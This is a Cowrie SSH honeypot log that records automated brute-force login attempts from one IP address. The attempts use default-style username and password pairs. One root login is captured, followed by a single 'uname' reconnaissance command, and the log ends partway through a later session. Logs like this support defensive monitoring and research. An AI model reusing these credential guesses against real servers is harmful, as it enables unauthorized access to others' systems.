{"eventid":"cowrie.login.failed","username":"cloudendure","password":"cloudendure","message":"login attempt [cloudendure/cloudendure] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:25.237595Z","src_ip":"212.227.125.160","session":"51b0ad45d433"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:26.290898Z","src_ip":"212.227.125.160","session":"51b0ad45d433"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54058,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b17e867d754","protocol":"ssh","message":"New connection: 212.227.125.160:54058 (1.2.3.4:22) [session: 8b17e867d754]","sensor":"my-vps","timestamp":"2025-08-26T21:37:30.674951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:30.676230Z","src_ip":"212.227.125.160","session":"8b17e867d754"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:30.740533Z","src_ip":"212.227.125.160","session":"8b17e867d754"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1","message":"login attempt [postgres/1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:30.940337Z","src_ip":"212.227.125.160","session":"8b17e867d754"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:32.006168Z","src_ip":"212.227.125.160","session":"8b17e867d754"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49446,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dcc1c9650d0","protocol":"ssh","message":"New connection: 212.227.125.160:49446 (1.2.3.4:22) [session: 3dcc1c9650d0]","sensor":"my-vps","timestamp":"2025-08-26T21:37:36.095323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:36.096249Z","src_ip":"212.227.125.160","session":"3dcc1c9650d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:36.147225Z","src_ip":"212.227.125.160","session":"3dcc1c9650d0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:36.342298Z","src_ip":"212.227.125.160","session":"3dcc1c9650d0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:37.424226Z","src_ip":"212.227.125.160","session":"3dcc1c9650d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44830,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9394b21f904","protocol":"ssh","message":"New connection: 212.227.125.160:44830 (1.2.3.4:22) [session: e9394b21f904]","sensor":"my-vps","timestamp":"2025-08-26T21:37:41.765280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:41.766251Z","src_ip":"212.227.125.160","session":"e9394b21f904"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:41.816654Z","src_ip":"212.227.125.160","session":"e9394b21f904"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:41.965594Z","src_ip":"212.227.125.160","session":"e9394b21f904"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:43.027323Z","src_ip":"212.227.125.160","session":"e9394b21f904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40220,"dst_ip":"1.2.3.4","dst_port":22,"session":"c77cccd5413d","protocol":"ssh","message":"New connection: 212.227.125.160:40220 (1.2.3.4:22) [session: c77cccd5413d]","sensor":"my-vps","timestamp":"2025-08-26T21:37:47.584206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:47.585155Z","src_ip":"212.227.125.160","session":"c77cccd5413d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:47.926454Z","src_ip":"212.227.125.160","session":"c77cccd5413d"}
{"eventid":"cowrie.login.failed","username":"stptbdd","password":"stptbdd","message":"login attempt [stptbdd/stptbdd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:48.139942Z","src_ip":"212.227.125.160","session":"c77cccd5413d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:49.200459Z","src_ip":"212.227.125.160","session":"c77cccd5413d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35604,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6b502b4acf","protocol":"ssh","message":"New connection: 212.227.125.160:35604 (1.2.3.4:22) [session: cc6b502b4acf]","sensor":"my-vps","timestamp":"2025-08-26T21:37:53.544253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:53.545044Z","src_ip":"212.227.125.160","session":"cc6b502b4acf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:53.590429Z","src_ip":"212.227.125.160","session":"cc6b502b4acf"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:53.767044Z","src_ip":"212.227.125.160","session":"cc6b502b4acf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:54.828027Z","src_ip":"212.227.125.160","session":"cc6b502b4acf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59224,"dst_ip":"1.2.3.4","dst_port":22,"session":"5749dfdbf090","protocol":"ssh","message":"New connection: 212.227.125.160:59224 (1.2.3.4:22) [session: 5749dfdbf090]","sensor":"my-vps","timestamp":"2025-08-26T21:37:58.878754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:59.039514Z","src_ip":"212.227.125.160","session":"5749dfdbf090"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:59.040430Z","src_ip":"212.227.125.160","session":"5749dfdbf090"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"password","message":"login attempt [minecraft/password] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:59.438820Z","src_ip":"212.227.125.160","session":"5749dfdbf090"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:00.490042Z","src_ip":"212.227.125.160","session":"5749dfdbf090"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54614,"dst_ip":"1.2.3.4","dst_port":22,"session":"c74dc9a861cd","protocol":"ssh","message":"New connection: 212.227.125.160:54614 (1.2.3.4:22) [session: c74dc9a861cd]","sensor":"my-vps","timestamp":"2025-08-26T21:38:04.413797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:04.415839Z","src_ip":"212.227.125.160","session":"c74dc9a861cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:04.460552Z","src_ip":"212.227.125.160","session":"c74dc9a861cd"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:04.600627Z","src_ip":"212.227.125.160","session":"c74dc9a861cd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:05.647405Z","src_ip":"212.227.125.160","session":"c74dc9a861cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50000,"dst_ip":"1.2.3.4","dst_port":22,"session":"de5944b7955d","protocol":"ssh","message":"New connection: 212.227.125.160:50000 (1.2.3.4:22) [session: de5944b7955d]","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.013986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.021379Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.099250Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.269152Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:38:10.384591Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.385319Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.447947Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:10.449206Z","src_ip":"212.227.125.160","session":"de5944b7955d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45388,"dst_ip":"1.2.3.4","dst_port":22,"session":"22b84e240f75","protocol":"ssh","message":"New connection: 212.227.125.160:45388 (1.2.3.4:22) [session: 22b84e240f75]","sensor":"my-vps","timestamp":"2025-08-26T21:38:15.503091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:15.506968Z","src_ip":"212.227.125.160","session":"22b84e240f75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:15.572252Z","src_ip":"212.227.125.160","session":"22b84e240f75"}
{"eventid":"cowrie.login.failed","username":"peer","password":"peer","message":"login attempt [peer/peer] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:16.085985Z","src_ip":"212.227.125.160","session":"22b84e240f75"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:17.258819Z","src_ip":"212.227.125.160","session":"22b84e240f75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40770,"dst_ip":"1.2.3.4","dst_port":22,"session":"9146466c687a","protocol":"ssh","message":"New connection: 212.227.125.160:40770 (1.2.3.4:22) [session: 9146466c687a]","sensor":"my-vps","timestamp":"2025-08-26T21:38:22.098947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:22.350704Z","src_ip":"212.227.125.160","session":"9146466c687a"}
